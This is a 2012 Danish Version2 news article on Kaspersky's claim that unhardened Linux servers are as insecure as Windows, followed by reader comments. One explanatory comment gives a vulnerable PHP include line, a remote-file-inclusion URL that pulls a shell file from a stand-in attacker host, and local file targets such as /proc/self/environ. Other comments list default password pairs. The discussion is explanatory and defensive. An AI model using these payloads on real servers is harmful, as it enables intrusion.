Sikkerhedsmyte får Linux-administratorer til åbne døren for hackere

Illustration: leowolfert/Bigstock
Folk tror, at Linux er mere sikkert end Windows, men det passer ikke, siger Kasperskys nordiske forskningschef. Der er nem adgang for hackere, fordi de færreste konfigurerer rigtigt.

'Linux er mere sikkert end Windows.'

Den tankegang har bidt sig fast hos mange it-folk, men på webserveren fører mantraet faktisk til frygtelig dårlig sikkerhed.

Sådan lød det fra Kasperskys nordiske forskningschef, svenske David Jacoby, på konferencen It-sikkerhed 2012, hvor han fokuserede på, hvad truslerne mod hjemmesider reelt bestod i.

»Vi bliver hacket fra fortiden! Vi fokuserer alt for meget på fremtidens trusler, selvom det er de gamle trusler, der er problemet. Næsten alle angreb i 2011 udnyttede gamle, trivielle sårbarheder,« forklarede David Jacoby.

Og en af forklaringerne er, at folk ikke går op i sikkerheden på deres Linux-servere, fordi de tror, at styresystemet er sikkert nok i sig selv.

»Folk har den opfattelse, at nogle styresystemer er mere sikre end andre. Men en standardinstallation af Linux er ikke sikrere end Windows. Der skal ’hardening’ til,« sagde forskningschefen.

En statistik over hjemmesider, der blev defaced sidste år, viste, at 1,2 millioner af dem kørte på Linux, mens 197.000 af dem lå på en Windows-server. Det afspejler omtrent de to teknologiers markedsandel, men viser også, at Linux-servere bestemt ikke er ’helle’ for hackere.

Rigtig konfiguration kan stoppe 99 procent af angrebene

Problemet er blandt andet, at Linux-maskinerne tit bliver udeladt fra de faste rutiner med sikkerhedsopdateringer. Men langt værre er det, at de færreste konfigurerer deres Linux-systemer rigtigt.

Den erfaring har David Jacoby gjort sig efter at have arbejdet med penetrationstest i 15 år, hvor han - med kundens tilladelse - har skullet prøve at hacke sig ind i systemerne.

»Når jeg laver en pen-test, bruger jeg aldrig en sårbarhed i softwaren, men finder huller i opsætningen på serveren. Hvis folk var bedre til at konfigurere, kunne 99 procent af angrebene undgås,« sagde David Jacoby.

Den mest brugte angrebsvej mod webservere sidste år var ’file inclusion’, efterfulgt af SQL-injektioner.

Men file inclusion-angreb kan stoppes helt ved at ændre en parameter for Apache-serveren.

»Konfigurering er ekstremt vigtigt, og folk gør det ikke rigtigt. Vi ’hardener’ ikke vores systemer, men tilføjer nye lag i stedet. Svaret er aldrig at købe nye produkter og tilføje nye lag, men at slå noget fra og konfigurere en server anderledes,« lød rådet fra David Jacoby, selvom han arbejder for en antivirusproducent.

Når virksomheder ikke konfigurerer rigtigt, handler det også om, at hele miljøet bliver mere komplekst, og så ryger overblikket.

I den situation sætter mange it-chefer og sikkerhedschefer deres lid til ekstern revision og compliance i forhold til regelsæt og standarder.

Men det er ikke en løsning på alle problemer.

»Fokuserer vi på at blive sikre, eller at være compliant? For eksempel vil du aldrig opdage, at du har en adgangskoder.txt-fil liggende ukrypteret på serveren ved at bruge software til automatisk at tjekke sikkerheden. For softwaren har kun en engelsk ordbog, ikke en dansk,« sagde David Jacoby.

It-sikkerhed 2012 var arrangeret af Dansk IT. Version2 var mediepartner på konferencen.

Tips og korrekturforslag til denne historie sendes til tip@version2.dk
Kommentarer (25)
sortSortér kommentarer
  • Ældste først
  • Nyeste først
  • Bedste først
Cristian Ambæk

At der er 1.2Mill kontra 197K "hacks" (som hedder cracks) på de to systemer, er nok så stor af flere årsager.

Linux er gratis, så flere ikke system administratorer bruger det kontra Windows.

lig med dårligere sikkerhed.

Linux web-server har en større markedsandel.

og sådan kan man blive ved. Så hvad med at finde ud af, hvor mange af disse 1.2Mil systemer var sat op af rigtige administratorer. Og hvor mange var sat op af en almen bruger. Inden man tager disse konklusioner, som overskriften hentyder "Sikkerhedsmyte får Linux-administratorer til åbne døren for hackere." Og hvis man skal påstå at (jeg kan bryde dit og dat) hvad med så at beskrive hvordan (du) dette gøres eller hvordan man forhindrer det, på mere end to linjer. Ellers er der jo ikke noget indhold i det. Så er det bare 1 mands påstand, om at han kan noget uden at bevise det. Det sku tyndt.

  • 9
  • 7
Christian Nobel

At der er 1.2Mill kontra 197K "hacks" (som hedder cracks) på de to systemer, er nok så stor af flere årsager.

lig med dårligere sikkerhed.

og sådan kan man blive ved.

Der findes som bekendt tre slags løgn: Løgn, forbandet løgn og statistik.

Der kunne ligeså godt stå en lyserød elefant og en giraf, for uden at vide noget om forudsætningen er tallene i bedste fald ubrugelige - er der tale om mange websites på en server (typisk lowcost/amatør webhotel), hvordan er defacement reelt foregået, hvordan er tallene fremkommet osv. osv.

Men det er jo sikkert vand på møllen for visse personer, hos visse "sikkerhedsfirmaer" der jo ynder at pleje myten om at udbredelse er ækvivalent med usikkerhed.

Så hvad med at finde ud af, hvor mange af disse 1.2Mil systemer var sat op af rigtige administratorer. Og hvor mange var sat op af en almen bruger. Inden man tager disse konklusioner, som overskriften hentyder "Sikkerhedsmyte får Linux-administratorer til åbne døren for hackere." Og hvis man skal påstå at (jeg kan bryde dit og dat) hvad med så at beskrive hvordan (du) dette gøres eller hvordan man forhindrer det, på mere end to linjer. Ellers er der jo ikke noget indhold i det. Så er det bare 1 mands påstand, om at han kan noget uden at bevise det. Det sku tyndt.

Desværre er det jo sådan med diverse "fagmedier" at der reelt set intet fagligt indhold er i artiklerne - det man får et fagligt udbytte af er de bidrag læserne efterfølgende kommer med.

  • 10
  • 5
Adam Tulinius

På "om version2"-siden står følgende: "Version2 er Danmarks it-medie, der henvender sig til de mange, der arbejder professionelt med it."

Jeg vil gerne argumentere for at langt de fleste nyheder/artikler er så indholdsløse at målgruppen ikke er dem der arbejder med IT, men cheferne..

Denne artikkel er et glimrende eksempel på hvad jeg mener: Der er masser af fluff, mens substansen er gående mod 0.

Er dette meningen?

  • 18
  • 3
Hans-Michael Varbæk

Jeg formoder der er tale om en parameter i PHP konfigurationen, jeg tror ikke Apache giver mulighed for at hente en ekstern fil og eksekvere den i sin standard konfiguration. I PHP er det indstillingen allow_url_fopen som ofte er synderen.

Nej :-) Det er ofte allow_url_include som tillader RFI aka Remote File Inclusion, som i bund og grund er fjern-inkludering af PHP filer via include, include_once, require, og require_once. (Men allow_url_fopen skal dog også helst slås fra, selvom det ikke er hovedsynderen.)

Eksempel: (vi kalder filen script.php) include($_GET['config']. ".config");

Er et af de mere udbredte problemer, hvor konfigurationsfiler og skabelonsfiler (templates) i PHP applikationer kan dynamisk læses hvor koden kort sagt, ikke er skrevet sikker nok og hvor en SDLC burde være implementeret. I ovenstående eksempel siger vi allow_url_include er slået til, og så er der måske, et gabende åbent RFI sikkerhedshul som kan udnyttes på følg. måde: script.php?config=http://angriber.tld/shell.txt%00

Hvorfor en null-byte i slutningen? Fordi så skærer serveren resten væk, dvs. at der ikke kommer et .config i slutningen, men hvis nu %00 blev skåret væk, altså fjernet, så kunne angriberen gøre det på den her måde: script.php?config=http://angriber.tld/shell.txt Hvor filen på serveren så skal hedde: shell.txt.config og den skal kunne læses som en normal tekst fil.

Hvis allow_url_include var slået fra, hvad så? Ja så er RFI, blevet til LFI, altså Remote, er blevet til Local og det er langt fra en lukning af sikkerhedshullet. Tværtimod bliver det kun lidt sværre, da det nu kun er lokale filer som kan inkluderes.

Lokale filer kan være: - Billeder og andre filer som brugere kan uploade til serveren - Log filer fra f.eks. Apache, SSH, osv. - /proc/self/environ - Osv.

Det kræver selvfølgelig at f.eks. "environ" el. diverse logs kan læses af applikationen. Der er selvfølgelig, mere til det end hvad jeg har beskrevet, så det kræver altså lidt, men PHP Suhosin, Apache Mod_Security, og f.eks. en WAF (Web Applikations Firewall) kan gøre en stor forskel og blokere de mest almindelige angreb, selv hvis ens applikation er usikker, men det kræver selvfølgelig at man tester denne for sikkerhedshuller. (Man kan ikke blindt tro at bare man installerer ovenstående er man sikker, da det kun er ekstra lag af sikkerhed, de fleste sikkerhedshuller ligger stadigvæk i kildekoden.)

Men file inclusion-angreb kan stoppes helt ved at ændre en parameter for Apache-serveren.

Remote File Inclusion ja, Local File Inclusion, nej. Medmindre man har under "disable_functions" fjernet alle muligheder for at bruge include, require, fopen, preg_match, eval, osv. De fleste større (dynamiske) applikationer, bruger ofte alle disse funktioner på et eller andet tidspunkt.

XSS, SQL Injection, LFI, RFI, RCE, osv. er dog sikkerhedshuller som er "cross-platform" og kan således påvirke næsten hvis ikke alle platformer. Det er sjældent de her problemer vedrører selve webserveren, da det faktisk er i PHP, hos udviklerne med enten for lidt tid eller viden om sikker kode som forårsager hovedproblemet.

Vi er efterhånden blevet gode til at sikre mod buffer overflows, osv., selvom den type fejl stadigvæk opstår, fordi de fleste it-sikkerheds kurser, i hvert fald dem som man lærer noget brugbart af, er der meget fokus på, selv nu her i 2012. Hvis man skal udvikle et buffer overflow exploit fra bunden, er det generelt meget sværre end et hvilket som helst web applikations angreb, da det kræver mere viden før man bliver garvet.

Web applikations sikkerhed (hvor angreb også hører under), er dog hurtigere og lettere at lære, hovedparten af guides og "tutorials" på de fleste hacker fora, handler om det, og meget af det er endda genbrugt viden. Fordi det har jo ikke ændret sig særligt meget, det er kun blevet en smule sværre over de sidste ~10 år?

Det som udover gør, at det er let at lære og især interesserer diverse hacktivister, blackhats, mm., er fordi det giver meget hurtigt resultater (selv hvis man leder efter 0days), er meget mere udbredt, da næsten alle hjemmesider er usikre på en eller anden måde (det er sjældent der ikke er en eller anden skavank på et under-domæne (subdomain), eller i måske en glemt mappe brug til, backup, udvikling, eller gamle uddaterede scripts.

En sidste ting som er vigtig at huske på, er jo at angreb mod PHP scripts ikke afhænger af server-arkitektur særligt meget, mens buffer overflows kræver flere forskellige ting, er det 32-bit, 64-bit, bypass af DEP, ASLR, Safe SEH, og hvilket styresystem? Windows eller Linux? Service Pack? Distribution hvis Linux? Med PHP, skal man slet ikke tænke på alle de her ting, når man angriber en web applikation som bruger dette sprog. (Og så er der jo heller ikke en "compiler" som retter diverse sikkerhedshuller efter udvikleren, som dog ikke kan rette alt endnu.)

Informations sikkerhed er altså ikke bare 5 bogstaver. (CISSP)

  • 12
  • 0
Henrik Kramselund Jereminsen Blogger

Jeg synes måske I er en anelse hårde i kritikken - specielt da emnet er reelt nok. Folk VÆLGER dårlige passwords a la root/root og admin/root admin/Admin admin/passw0rd osv.

Vi ser det gang på gang at der bliver scannet efter sårbare services, som SSH med root adgang, med dårligt password => fri adgang til hele serveren.

Samme ses med MySQL med direkte adgang, man glemmer at fjerne install.php fra et eller andet system osv. osv.

Jeg havde nok forventet (frygtet) mere Linux vs Windows bashing, lad os gerne undgå det denne gang - og erkende at:

En Linux server skal patches ligesom en Windows server, og central administration af sikkerhedsparametre vil være en fordel - men kræver en indsats. Vores valg til at vedligeholde konfiguration er Puppet fra http://puppetlabs.com/ findes i to versioner http://puppetlabs.com/puppet/compare/ vælg selv hvad der passer jer.

  • 12
  • 0
Svante Jørgensen

Hvis ens system administrator er så amatøragtig et kvaj at han tænke "Linux, det er så sikkert at jeg ikke behøver konfigurere nogen applikationer på det", så har man et meget større problem end forskellen i sikkerhed på nogen som helst operativsystemer.

  • 3
  • 0
Christian Nobel

Artiklen skulle som minimum have indeholdt eksempler på konfigurations-parametre der er problematiske.

Slut færdig. Ingen undskyldninger.

Især hvis diskussionen fra Kaperskys side går på at sætte Linux i relief til Windows, hvilket et "sikkerhedsfirma" kan have en del ikke altruistiske grunde til at gøre.

Som en del af debattens indlæg (hvorved artiklen først finder sin berettigelse) kører omkring, så er der rigtig meget PHP blandet ind i diskussionen, og så er spørgsmålet om der måske mere er tale om en PHP vs ASP diskussion.

Vi ved det ikke for artiklen kommer kun med nogle løst underbyggede udsagn, uden at gå i dybden med hverken materie eller løsning.

  • 2
  • 0
Cristian Ambæk

Vi ser det gang på gang at der bliver scannet efter sårbare services, som SSH med root adgang, med dårligt password => fri adgang til hele serveren.

Samme ses med MySQL med direkte adgang, man glemmer at fjerne install.php fra et eller andet system osv. osv.

@Henrik Men så kommer man tilbage til. Er det system administratore (rigtige administratore) power users eller almen brugere som sætter disse systemer op? Hvis ikke du kan sige hvem der har sat hvad op, hvordan kan du så retfærdiggøre at et indlæg som dette har tekst som referer til at IT-folk sætter Linux op med dårlig sikkerhed. I den professionelle ende?

  • 3
  • 1
Sven Waskönig

Jeg vil da give David Jacoby ret i, at mange nok har en tendens til at ikke at sætte systemerne ordentligt op. Dette vil jeg så vove at påstå gælder både Windows, Linux og hvad der ellers findes af operativsystemer.

Sagen er den, at IT-branchen de seneste mange år er blevet "befolket" af flere og flere "wizard-eksperter". Man starter et installationsprogram op og trykker "Næste" et antal gange, indtil man er færdig. Man tvinges ikke nødvendigvis til at gå i detaljer med opsætningen.

Og hvorfor går man så ikke op i at følge op på installationen? Jeg gætter på:

  1. Manglende erfaring/viden. En ekspert i AD/LDAP er ikke nødvendigvis ekspert i IIS/Apache. Men traditionelt forventer den øvrige organisation, at en IT-mand er universalnørd og bare kan "det der med IT". Og hvis installationen eller opsætningen nu kan gennemføres med en nem wizard, bliver der ikke altid tilkaldt en ekspert.

  2. Tidspres. Noget skal virke inden en deadline og der bruges tid på at få ting til at spille sammen med de øvrige installationer mv.

Man springer over, hvor gærdet er lavest - og wizards gør det nemt :-)

  • 6
  • 0
Henrik Kramselund Jereminsen Blogger

Jeg kan straks afvise at det er amatører. Uden at udlevere specifikke kunder, så er det professionelle IT-folk som jeg har med at gøre - de lever af det - og desværre sker det alt for tit at folk vælger dårlige passwords, sætter systemerne op halvt, glemmer at fjerne test, debug, osv. Vi snakker her om eksempler fra min karriere med IT-sikkerhed over +10 år med besøg og audits hos banker og store kendte Facility Management sites.

På et af disse besøg fandt jeg eksempelvis netværksfilsystemet NFS i en konfiguration mellem to servere, hvor den ene eksporterede et katalog til hele verden (alle IP adresser kunne mounte og læse) - hvor der lå en kopi af backup fra den anden. Det var derefter trivielt at pakke brugerdatabasen ud - og tillige fandt jeg flere brugere uden password - som kunne bruges på begge systemer.

Er det noget som sker idag, yesssssir! Der sker dagligt, flere gange om dagen, så uden procedurer og systemer der checker VIL Linux servere (og Windows BTW) være usikre.

Lad os tage et andet simpelt eksempel - phpinfo, dette script er lækkert til at checke at PHP er aktivt og virker. Desværre er det også en guldgrube af information om et system og bør ikke være aktivt - men glemmes ofte efter test. Hvor mange herinde husker at slå det fra efter test?

http://php.net/manual/en/function.phpinfo.php

eller phpMyAdmin til MySQL databaser, suk - jeg begynder snart at græde over den Sisyfos opgave det er at sikre systemerne idag - med "hjælp" fra professionelle IT-folk.

Disclaimer: problemet er som sådan IKKE at phpMyAdmin og lignende tools eksisterer, problemet er at de IKKE kræver at man under install skal angive en bruger for at kunne logge på! På samme måde er der professionelle leverandører som F5 der på deres high-end load balancers tillader admin/admin - det er faktisk default og kan stå sådan i flere år!

I den modsatte ende har Tomcat fjernet Admin delen som default, man skal downloade det specifikt, og man skal sætte en bruger ind - ingen defaults (siden Tomcat 5.5 har ikke lige checket seneste) og en af vores nyeste switche - findes der heller ingen default brugere - DET er vejen frem, værktøjerne skal gøre det sværere at være usikker.

Links: http://www.phpmyadmin.net/ http://da.wikipedia.org/wiki/Sisyfos http://php.net/manual/en/function.phpinfo.php

  • 8
  • 0
Baldur Norddahl

Hverken i artiklen eller de efterfølgende kommentarer er der en eneste der nævner et Linux problem. Og dermed vil opdateringer til operativsystemet ikke hjælpe på noget af alt det i nævner. Dermed ikke sagt at man ikke skal holde sit system opdateret.

Diverse PHP scripts er brugerinstalleret programmel. Apache+PHP kan også installeres på Windows og vil give præcis de samme problemer.

Overskriften undrede mig da det efterhånden er lang tid siden at man har hørt om "hacks" som virker imod en standard installeret Linux (og Windows ditto!).

  • 7
  • 3
Casper Thomsen

Hej Adam.

På "om version2"-siden står følgende: "Version2 er Danmarks it-medie, der henvender sig til de mange, der arbejder professionelt med it."

Jeg vil gerne argumentere for at langt de fleste nyheder/artikler er så indholdsløse at målgruppen ikke er dem der arbejder med IT, men cheferne..

Denne artikkel er et glimrende eksempel på hvad jeg mener: Der er masser af fluff, mens substansen er gående mod 0.

Er dette meningen?

Selv om Version2's journalister er it-kyndige fagjournalister, har de oftest ikke den nødvendige fagekspertise til at gå i dybden og eksempelvis komme med konkret kode, som løser et problem. De er fagjournalister, ikke systemadministratorer, udviklere eller systemintegratorer.

Når Version2 skriver til it-professionelle betyder det også, at vi skriver både til udviklere, it-chefer og konsulenter. Ovenstående artikel er et eksempel på en problemstilling, som ikke kun er relevant for systemadministratorer, men også kan være væsentlig for andre faggrupper inden for it-området.

Hvis du kommer som ekspert på et område, vil det være meget svært for os journalistisk at ramme dig på et niveau, der matcher din ekspertise inden for et dybt og snævert fagligt emne.

Derfor betyder vores community i form af kommentarer og blogs utroligt meget for os, fordi det er her, at læserne kan finde et ekstra lag af dybde og faglighed fra eksperter som dem selv.

Hans-Michael Varbæks kommentar oven for er et glimrende eksempel på dette, og det samme er de fremragende indlæg i Henrik Kramshøjs nye blog, hvor der er et højt fagligt og teknisk niveau.

Det betyder ikke, at vores journalistik altid er, som den skal være. Det er eksempelvis et fint input til Jespers artikel ovenfor, at nogle af eksemplerne kunne være konkretiseret yderligere, men vi er som sagt ikke i stand til at levere en teknisk manuel, hver gang vi skriver artikler - det har vi hverken ekspertise eller tid til.

Vi kan dog sagtens blive bedre til at linke til materiale, hvor man kan finde den dybde og anvisninger - i det konkrete eksempel kunne det være et link til et site, der fortæller om, hvordan man sikrer sin Linux-server.

Jeg ser det altså ikke som en svaghed ved Version2, at man kan finde dybde og ekspertise i vores kommentarer og blogs, men tværtimod som en styrke.

Mvh Casper, Version2

  • 8
  • 0
Jacob Nordfalk

Diverse PHP scripts er brugerinstalleret programmel. Apache+PHP kan også installeres på Windows og vil give præcis de samme problemer.

Fuldstændigt rigtigt! Jeg har i årevis (faktisk henad 10 år) haft Linux kørende, med en Java Tomcat oven på, til en snes domæner, bl.a. http://javabog.dk, uden nogensinde at have problemer med indbrud. Masser af forsøg, det kan jeg se i logfilerne, men ikke ét vellykket forsøg.

Men for 3 måneder siden skulle jeg så lave en lille e-butik og aktiverede php, wordpress, et e-handelsmodul og et par wordpress-plugins. Og det var en anden sag. Der gik mindre end 2 uger, så var serveren inficeret.

Problemet skyldtes et billedeplugin til wordpress der var kodet af en amatør som tillod angribere at komme ind.

Min erfaring er derfor

1) hærdning af et standard Linux-system er ikke nødvendigt, blot omtanke og sikre koder

2) hærdning af php og wordpress er nødvendigt, fordi nogle af de der skriver php-moduler ikke er særligt erfarne MHT sikkerhed

  • 8
  • 0
Jesper Kildebogaard

Kære debattører,

Jeg har skrevet artiklen ud fra David Jacobys oplæg på en konference for it-sikkerhedschefer og lignende. Han har måske vinklet sit indlæg lidt skarpt for at ruske op i folk, men skriver til mig i en kort kommentar, efter at have set artiklen og noget af debatten, at det ikke kun handler om PHP-koden, men hele systemet.

Han er til konference i Mexico lige nu, men jeg følger op med hans kommentarer, når han er lettere at få fat i.

vh.

Jesper, Version2

  • 4
  • 0
Bryan Østergaard

Mit gæt er umiddelbart at der er tale om væsentligt færre Linux servere end Windows servere (ikke at dette på nogen måde skal være en undskyldning).

Jeg har i hvert fald set temmeligt mange linux servere med adskillige tusind webhoteller på, nogen gange op imod 10.000 webhoteller (det er rimeligt typisk for udbydere af ultra billige webhoteller). Jeg mindes ikke at have set nogen Microsoft IIS servere komme bare tilnærmelsesvis i nærheden af dette.

Så statistikken er nok lidt misvisende, pointen om at rigtigt mange servere ikke er ordentligt beskyttede mod angreb er meget reel og bør tages seriøst.

Så forhåbentligt kan det få nogle systemadministratorer til at kigge på deres sikkerhed nok en gang - både med tanke på at forsvare i mod angreb som SQL injections osv., men også med henblik på privilege separation så det at et enkelt webhotel får sjusket ikke ender op med tusindsvis af defacede websites.

  • 0
  • 0
Hans-Michael Varbæk

Men for 3 måneder siden skulle jeg så lave en lille e-butik og aktiverede php, wordpress, et e-handelsmodul og et par wordpress-plugins. Og det var en anden sag. Der gik mindre end 2 uger, så var serveren inficeret.

Det lyder jo som TimThumb :-) Rigtig mange plugins og themes (temaer), bruger stadigvæk den gamle uddaterede usikre version. Der er kommet en ny som er blevet skrevet fra bunden ;-) http://code.google.com/p/timthumb/ http://www.exploit-db.com/wordpress-timthumb-exploitation/

Mange af de plugins og themes, laver endda navnet om på timthumb.php så man bliver nødt til enten at søge i kildekoden, eller åbne filerne manuelt for at være sikker på, de ikke indeholder denne fil da det stadigvæk er et rimeligt stort problem.

Der har på det seneste været en del WordPress hjemmesider, som er blevet inficeret, hvor en stor del af problemerne skyldes dette script.

  • 1
  • 0
Cristian Ambæk

@Henrik Jeg kan ikke se at bare fordi man arbejder med noget, at det automatisk skulle betyde at man er professionel. En bliver ikke ekspert bare fordi man arbejder i en bank, med deres systemer. Og det lyder langt fra at det er eksperter / professionelle IT personale du har med at gøre. Eller også sidder de ikke i deres respektive område, og laver derfor fejl som rigtige linux administratore ikke ville lave. Og dette nævnes der ikke i artiklen. Omkring hvem der har sat systemerne op. Folk som arbejder med linux sikkerhed hver dag, eksperter, professionelle it folk som ikke har stor ekspertise inden for linux og laver derfor fejl, eller andre.

  • 0
  • 0
Henrik Kramselund Jereminsen Blogger

@christian

Jeg kan ikke se at bare fordi man arbejder med noget, at det automatisk skulle betyde at man er professionel. En bliver ikke ekspert bare fordi man arbejder i en bank, med deres systemer. Og det lyder langt fra at det er eksperter / professionelle IT personale du har med at gøre. Eller også sidder de ikke i deres respektive område, og laver derfor fejl som rigtige linux administratore ikke ville lave.

Den typiske definition på en professionel er at man lever af det, har det som sit erhverv. Vi forventer således ofte at professionelle indenfor et område er fagligt kompetente. Eksperterne må så være de dygtigste indenfor et felt - og forventeligt er de fleste af dem beskæftiget indenfor det pågældende fagområde.

Formentlig også det du mener når du introducerer begrebet "rigtige linux administratore" - men jeg må nok desværre skuffe dig - jeg har gennem min mangeårige karriere, startende som studentermedhjælp i IBM i 1994 set nok til at jeg igen må gentage:

  • Folk VÆLGER dårlige passwords a la root/root og admin/root admin/Admin admin/passw0rd osv.

  • Hvis man ikke i systemet kræver bedre sikkerhed lander man med default passwords

  • Hvis man ikke opdaterer systemerne så er de usikre, Wietse Venema har ved flere lejligheder talt om dette emne

  • Logs fra servere skal undersøges, læses og der skal handles

Servere skal hærdes før de sætte i produktion, selv en OpenBSD skal da hærdes, og den er ellers "secure by default"

Grunden til at referere til banker er at de i Danmark (udover militæret) er nogle af dem som bekymrer sig mest om sikkerhed og afsætter flest ressourcer til dette. Så når selv banker og dem som driver banksystemer har sikkerhedsproblemer ... så er det ikke svært at sige hvor mange problemer den gennemsnitlige virksomhed har.

I den forbindelse er sikkerhed i virksomheder et "nyt områder" og decentraliseret styring og problmemet med fat clients (PC på skrivebordet) har ikke gjort det nemmere at styre data osv. osv.

Problemet er reelt, artiklen er måske ikke verdens bedste - men istedet for at diskutere det, så lad os hellere gøre noget ved problemet, eller hvad?

Lidt ligesom når folk diskuterer om det hedder hack, crack, hacker, cracker - get over it :P - den kamp blev tabt i starten af 1990'erne så flames til /dev/null tak

  • 3
  • 0
Anonym

Nu skal jeg ikke gøre mig klog på sprogene opsætning af server eller lignende, for det er jeg ikke kompetent nok til.

Men jeg læser artiklen som et opråb til at højne sikkerheden, og tilpasse serverenden til de opgaver den skal løse. Det betyder, at der opfordres til at man kigger sin server efter, og evt. overlader denne opgave til en specialist inden for serverområdet. Man er jo ikke nødvendigvis specialist i Linux- Apache- opsætning, bare fordi man er god til at kode.

Der er vel heller ikke nogen der forventer at V2 eller et IT-sikkerhedsfirma skal komme konkrete eksempler på sikkerhedshuller og løsningen på disse sikkerhedsproblemer. Det er faktisk lidt dårlig forretningspolitik, hvis V2 eller IT-sikkerhedsfirmaer udbreder løsninger på konkrete sikkerhedsproblematikker. Der er jo folk der lever af det, og det er ikke nogens pligt at underminerer sådanne virksomheders forretningsmuligheder.

  • 0
  • 1
Christian Nobel
  • 0
  • 0
Log ind eller Opret konto for at kommentere